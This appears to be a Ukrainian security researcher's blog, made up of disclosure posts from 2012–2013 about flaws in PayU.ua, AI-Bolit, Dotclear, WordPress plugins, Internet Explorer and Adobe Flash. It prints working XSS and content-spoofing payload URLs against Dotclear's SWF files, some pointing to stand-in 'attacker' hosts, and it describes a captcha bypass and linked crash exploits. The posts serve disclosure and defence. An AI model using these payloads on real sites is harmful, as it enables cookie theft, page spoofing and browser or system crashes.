Websecurity - Веб безпека

12.12.2012

У листопаді, 05.11.2012, я знайшов Insufficient Anti-automation, Brute Force і Abuse of Functionality уразливості на http://www.payu.ua - сайті системи онлайн платежів PayU. Про що найближчим часом сповіщу адміністрацію сайта.

Як і всі ті сайти платіжних систем власники яких заявляли про відповідність PCI DSS і на яких я знаходив дірки, на сайті www.payu.ua заявлена відповідність PCI DSS. Але їм ще потрібно виправляти чимало уразливостей, щоб цього досягти.

Стосовно дірок на сайтах онлайн магазинів та електронних платіжних систем в останнє я писав про уразливості на www.allmoney.com.ua та plimus.com.

Детальна інформація про уразливості з’явиться пізніше.

18.04.2013

Insufficient Anti-automation:

http://www.payu.ua/zayavka-na-podklyuchenie

Не було захисту від автоматизованих атак. Зараз поставили капчу.

Brute Force:

https://secure.payu.ua/cpanel/

Окрім BF тут ще і CSRF. Капча обходиться видаленням кукіса.

Abuse of Functionality / Insufficient Anti-automation:

https://secure.payu.ua/cpanel/recover_password.php

Витік логінів/емайлів. Капча обходиться видаленням кукіса.

Виправили лише одну IAA уразливість. Всі інші уразливості досі не виправлені.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах IndiaNIC FAQS Manager, Level Four Storefront та WP Banners Lite. Для котрих з’явилися експлоіти. IndiaNIC FAQS Manager - це плагін для управління списками часто задаваємих питань, Level Four Storefront - це плагін для створення кошика покупця, WP Banners Lite - це локальна банерна система.

• WordPress IndiaNIC FAQS Manager 1.0 XSS / CSRF (деталі)
• WordPress Level Four Storefront SQL Injection (деталі)
• WP Banners Lite 1.40 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

22.01.2013

У грудні, 02.12.2012, я виявив Brute Force та Information Leakage уразливості в секюріті додатку AI-Bolit. Про що вже повідомив розробникам веб додатку.

AI-Bolit — це скрипт для пошуку вірусів, троянів, бекдорів та іншої хакерської активності на хостингу.

Детальна інформація про уразливості з’явиться пізніше.

13.04.2013

Brute Force (WASC-11):

http://site/ai-bolit.php?p=1

Information Leakage (WASC-13):

http://site/AI-BOLIT-REPORT.html

http://site/AI-BOLIT-REPORT-<дата>-<час>.html

Витік звітів зі статистикою та FPD. В тому числі такі звіти заіндексовані пошуковими системами. Якщо в звіті показані виявлені на сайті бекдори, то отримавши доступ до звіту, можна дізнатися про бекдори і з їх використанням похакати сайт.

Уразливі всі версії AI-Bolit. У версії 20121014 формат імені файла був змінений (з доданням дати і часу), але його все ще легко підібрати, тому IL уразливість залишилась актуальною. Розробник програми пообіцяв виправити ці уразливості в нових версіях. У версії 20130201 було заборонене індексування звіту та в ім’я файла звіту додається випадкове число (для захисту від підбору імені).

10.01.2013

У листопаді, 13.11.2012, я виявив Cross-Site Scripting та Content Spoofing уразливості в Dotclear. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливість в Dotclear.

Детальна інформація про уразливості з’явиться пізніше.

12.04.2013

Cross-Site Scripting (WASC-08):

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)
http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml
http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt

Код виконається після кліку. Це strictly social XSS.

Content Spoofing (WASC-12):

http://site/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

Можна включати текст, зображення та html (наприклад, для link injection).

http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt
http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv
http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt
http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3

Уразливі Dotclear 2.4.4 (і частково 2.5) та попередні версії. В версії Dotclear 2.5 розробники виправили уразливості, але неефективно: по-перше, всі три вразливі флешки наявні в движку (тому з репозиторію чи з сайтів не слід їх брати для використання в своїх проектах, бо це вразливі версії флешек), по-друге, заборона прямого доступу до флешек (через .htaccess), щоб не можна було використати уразливості в них, працює лише на Apache, але не на інших веб серверах (тому сайти на них є вразливими).

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Occasions, Count Per Day та IndiaNIC FAQS Manager. Для котрих з’явилися експлоіти. Occasions - це плагін для зміни логотипів по датам, Count Per Day - це плагін для ведення статистики відвідувань, IndiaNIC FAQS Manager - це плагін для управління списками часто задаваємих питань.

• WordPress Occasions 1.0.4 Cross Site Request Forgery (деталі)
• WordPress Count Per Day 3.2.5 XSS (деталі)
• WordPress IndiaNIC FAQS Manager 1.0 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В записі Denial of Service в Internet Explorer я навів відео TheSecuritylab з вибиванням IE7. І 13.02.2013 я розробив експлоіт заснований на даному відео і дослідив дану уразливість в різних браузерах. Як я перевірив, вона також працює в IE6 та IE8.

Тому це Denial of Service уразливість в Internet Explorer 6, 7, 8. Це access violation.

DoS:

Браузер вибиває при рекурсивному включенні css-файла. Це відбувається через access violation (aka segmentation fault) в iexplore.exe. Щоб експлоіт спрацював в IE6 потрібно оновити сторінку.

Експлоіт:

IE_DoS_Exploit.html

Уразливі Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7
(7.00.5730.13), Internet Explorer 8.0 (8.00.6001.18702) та попередні версії цих браузерів. IE9 не вразливий.

У березні, 28.03.2013, я знайшов Cross-Site Scripting уразливості в банерній мережі http://img.com.ua (на піддоменах). Про що найближчим часом сповіщу адміністрацію проекту.

В 2008-2010 роках я писав про численні банерні системи (українські й закордонні), що мають подібні уразливості. Проблема така ж сама як і випадку уразливостей в системах в phpAdsNew, OpenAds та OpenX.

У флеш банерах на піддоменах bbn.img.com.ua і bbnu.img.com.ua (і потенційно інших піддоменах), є XSS уразливість. Якщо вони зроблені згідно з рекомендаціями банерної системи, то можлива XSS атака (strictly social XSS) через параметр bn_url (при кліку на банер). Про подібну атаку я вже писав в статті XSS уразливості в 8 мільйонах флеш файлах.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• цікавий

На всіх піддоменах даного сайта є десятки тисяч флеш банерів. Не всі з них уразливі, є піддомени де жодна флешка не має таких уразливостей, але на зазначених піддоменах всі флешки уразливі.

В даній добірці уразливості в веб додатках:

• Novell GroupWise Agents Arbitrary File Retrieval (деталі)
• DALIM Dialog Server ‘logfile’ Local File Inclusion (деталі)
• libxslt vulnerabilities, as used in Google Chrome (деталі)
• Apache Commons FileUpload - Insecure examples (деталі)
• (0Day) HP SiteScope SOAP Call getSiteScopeConfiguration Remote Code Execution Vulnerability (деталі)
• OS Command Injection in CosCms (деталі)
• (0Day) HP SiteScope UploadFilesHandler Remote Code Execution Vulnerability (деталі)
• Arbitrary Files Reading in mnoGoSearch (деталі)
• (0Day) HP SiteScope SOAP Call create Remote Code Execution Vulnerability (деталі)
• Cross-site Scripting vulnerabilities in i-doit CMDB (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Events Manager, LeagueManager та Simply Poll. Для котрих з’явилися експлоіти. Events Manager - це плагін для управління та відображення подій, LeagueManager - це плагін для управління спортивними лігами, Simply Poll - це плагін для створення голосувань.

• Multiple XSS vulnerabilities in Events Manager WordPress plugin (деталі)
• WordPress LeagueManager 3.8 SQL Injection (деталі)
• WordPress Simply Poll 1.4.1 CSRF / XSS (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

02.03.2013

У січні, 27.01.2013, я виявив Denial of Service уразливість в Adobe Flash. Уразливим була остання на той момент версія флеш плеєра. Дана DoS спрацьовує при перегляді спеціальної флешки і призводить до краху операційної системи (BSOD). Про що вже повідомив розробникам додатку (ще у січні).

Adobe вже виправила дану уразливість в середині лютого. Але працівники компанії ще не завершили всі дослідження цієї DoS, тому публікація деталей затягнулася більше ніж на місяць.

Раніше я вже писав про DoS уразливість у Flash плагіні.

Детальна інформація про уразливість з’явиться пізніше, як тільки Adobe завершить свої дослідження.

03.04.2013

Ще минулого місяця я виклав відео, що демонструє цю DoS уразливість в Flash плагіні. Щоб стимулювати людей оновлювати свій флеш плагін.

Adobe Flash DoS BSOD

Це memory corruption (access violation) уразливість. Яка може використовуватися для BSOD та потенційно для віддаленого виконання коду. Дане відео я зробив у січні 2013 року.

Для атаки використовується флешка VideoJS Flash Component від Zencoder. Розробників цього відео плеєра я також сповістив ще на початку лютого.

Атака працює в браузерах Firefox та Opera (причому BSOD тільки в Firefox):

У Mozilla Firefox 15.0.1 і 18.0.1 - зависання браузера (який не можна навіть закрити) і BSOD системи.
У Mozilla Firefox 3.0.19 і 10.0.7 ESR - ніяких збоїв (все робить нормально).
У Opera 10.62 - зависання браузера (який можна закрити).

PoC/Exploit:

Adobe Flash DoS BSOD.rar

Для запуску експлоіта потрібно розмістити його на веб сервері (наприклад, на localhost), помістити поруч з poc.htm будь-який mp4-файл під іменем poc.mp4 та запустити htm-файл (на веб сервері). Та потрібно клікнути мишкою по зображенню динаміка або по полю відео плеєра.

Уразлива версія Adode Flash 11.5.502.146. Атака працює лише на відеокартах AMD/ATI. В версії 11.6.602.168 уразливість вже не працює. Адоб виправила її 12.02.2013 в своєму патчі APSB13-05, що виправив численні уразливості в флеш плеєрі. При цьому Адоб зробила це приховано не вказавши цю уразливість і не пославшись на мене. А після мого повідомлення наприкінці січня, вони 1,5 місяця “перевіряли” і з’їхали, що в них не повторюється ця уразливість (при тому, що я відтворив її на багатьох комп’ютерах з відеокартами ATI), що вони знати нічого не знають (дірка була випадково виправлена в APSB13-05) і ця DoS їх не стосується.